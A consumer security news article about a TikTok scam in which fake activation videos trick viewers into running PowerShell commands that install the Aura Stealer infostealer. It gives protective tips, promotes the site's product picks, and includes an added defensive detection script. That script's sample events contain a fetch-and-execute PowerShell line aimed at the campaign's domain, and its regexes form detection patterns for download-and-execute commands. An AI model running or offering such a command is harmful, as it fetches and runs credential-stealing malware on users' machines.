TikTok malware scam uses fake software activation guides to steal data

Cybercriminals are again turning TikTok into a trap for unsuspecting users. In this case, they disguise malicious downloads as free activation guides for popular software such as Windows, Microsoft 365, Photoshop and Netflix Premium.

Security expert Xavier Mertens first spotted the campaign, confirming that a similar version of the scheme was seen earlier this year. According to BleepingComputer, these fake TikTok videos show short PowerShell commands and teach viewers to run them as administrators to “activate” their programs.

In fact, those instructions connect to a malicious website and pull in malware known as Aura Stealer, which siphons stored passwords, cookies, cryptocurrency wallets and authentication tokens from the victim’s computer.

Cybercriminals use fake TikTok videos to trick users into downloading malware disguised as free tutorials. (Kurt “CyberGuy” Knutsson)

How the TikTok scam works

This campaign uses what experts call a ClickFix attack. It is a social engineering tactic that makes victims feel they are following legitimate technical instructions. The instructions seem quick and easy: run one short command and get instant access to the premium software.

But instead of activating anything, the PowerShell command connects to a remote domain called slmgr[.]win, which downloads malicious files from cloud-hosted pages. The main file, Updater.exe, is a variant of the Aura Stealer malware. Once inside the system, it hunts down your credentials and sends them back to the attacker.

Another file, source.exe, uses Microsoft’s C# compiler to load code directly into memory, making it more difficult to detect. The purpose of this additional payload is not fully known yet, but the pattern follows previous malware used to steal crypto and deliver ransomware.
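For defenders, the chain described above leaves two visible traces in process-creation logs: a PowerShell command that fetches and runs remote content in one step, and the C# compiler started by a parent that has no reason to compile code. The following is an added example, not code from the article or the researchers it cites; it assumes events with Sysmon-style Image, ParentImage and CommandLine values, that the compiler appears as csc.exe, and a hypothetical allowlist of build tools. All sample events are constructed.

```python
import re

# Domain named in the article, kept defanged here and refanged only for matching.
KNOWN_DOMAINS = {"slmgr[.]win"}
# Assumption: parents that legitimately invoke the C# compiler on this fleet.
CSC_ALLOWED_PARENTS = {"msbuild.exe", "devenv.exe", "dotnet.exe"}
DOWNLOAD = re.compile(
    r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def findings(image_path, parent_path, cmd):
    """Return the names of the rules a process-creation event triggers."""
    image, parent = basename(image_path), basename(parent_path)
    hits = []
    if image in {"powershell.exe", "pwsh.exe"}:
        # Fetch and execute in a single command is the shape of a ClickFix one-liner.
        if DOWNLOAD.search(cmd) and EXECUTE.search(cmd):
            hits.append("ps_download_and_execute")
        refanged = cmd.lower().replace("[.]", ".")
        if any(d.replace("[.]", ".") in refanged for d in KNOWN_DOMAINS):
            hits.append("known_bad_domain")
    # A compiler launched by something other than a build tool deserves a look.
    if image == "csc.exe" and parent not in CSC_ALLOWED_PARENTS:
        hits.append("csc_unexpected_parent")
    return hits


# Constructed sample events (Image, ParentImage, CommandLine); not campaign captures.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
SAMPLE_EVENTS = [
    (PS, r"C:\Windows\explorer.exe", "powershell iex (irm slmgr[.]win/placeholder)"),
    (CSC, r"C:\Users\user\AppData\Local\Temp\source.exe", "csc.exe /noconfig @placeholder.cmdline"),
    (PS, r"C:\Windows\explorer.exe", "powershell Get-ChildItem"),
    (CSC, r"C:\Program Files\MSBuild\msbuild.exe", "csc.exe /noconfig @build.rsp"),
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(basename(event[0]), findings(*event))
```

PowerShell's own Add-Type also starts csc.exe, so the last rule needs tuning against a baseline before it is used for alerting.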

Those short “activation” commands secretly connect to malicious servers that host info-stealing malware such as Aura Stealer. (Kurt “CyberGuy” Knutsson)

How to stay safe from TikTok malware scams

Although these scams look convincing, you can avoid becoming a victim by taking proper precautions.

1) Avoid shortcuts

Never copy or run PowerShell commands from TikTok videos or random websites. When something promises free access to premium software, it can be a trap.

2) Use reliable sources

Always download or run the software directly from the official website or through official app stores.

3) Keep security tools updated

Outdated antivirus software or browsers cannot detect the latest threats. Update your software regularly for protection.

4) Use strong antivirus software

Install robust antivirus software that provides real-time scanning and protection against Trojans and phishing attempts.

The best way to protect yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your information and digital assets safe.

Get my picks for the best antivirus protection for your Windows, Mac, Android and iOS devices at CyberGuy.com

5) Sign up for a data removal service

If your private data ends up on the dark web, a data removal or monitoring service can alert you and help remove sensitive information.

While no tool can guarantee complete removal of your data from the Internet, a data removal service is definitely a good choice. They are not cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically removing your information from hundreds of websites. It is what gives you peace of mind and has proven to be the most effective way to erase your private data from the Internet. By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with information they can find on the dark web, making it harder for them to target you.

Check out my top picks for data removal services and get a free scan to find out if your data has already appeared on the web by visiting CyberGuy.com

6) Reset credentials

If you’ve ever followed suspicious instructions or entered credentials after watching a “free trial” video, reset all your passwords immediately.

7) Reset passwords

Start with your email, financial and social media accounts. Use unique passwords for each site. Consider using a password manager, which securely stores and generates complex passwords, reducing the risk of password reuse.

Next, check whether your email has been exposed in previous breaches. Our #1 password manager pick (see CyberGuy.com) includes a built-in scanner that checks whether your email address or passwords appear in known leaks. If you find a match, immediately change any reused passwords and secure those accounts with new, different credentials.

Check out the best password managers reviewed in 2025 at CyberGuy.com

8) Enable multi-factor authentication

Add an extra layer of security by enabling multi-factor authentication where possible. Even if your passwords are stolen, attackers won’t be able to log in without your verification.

If you followed suspicious steps, change your passwords, enable two-factor authentication, and stay alert for future scams. (Pet Pictures)

Kurt’s Key Takeaways

TikTok’s global reach makes it a prime target for scams like this. What seems like a useful hack can end up costing you your security, your money, and your peace of mind. Always be careful, trust only verified sources and remember that there is no such thing as a free activation shortcut.

Is TikTok doing enough to protect its users from scams like this? Let us know by writing to us at CyberGuy.com

Copyright 2025 cyberguy.com. All rights reserved.
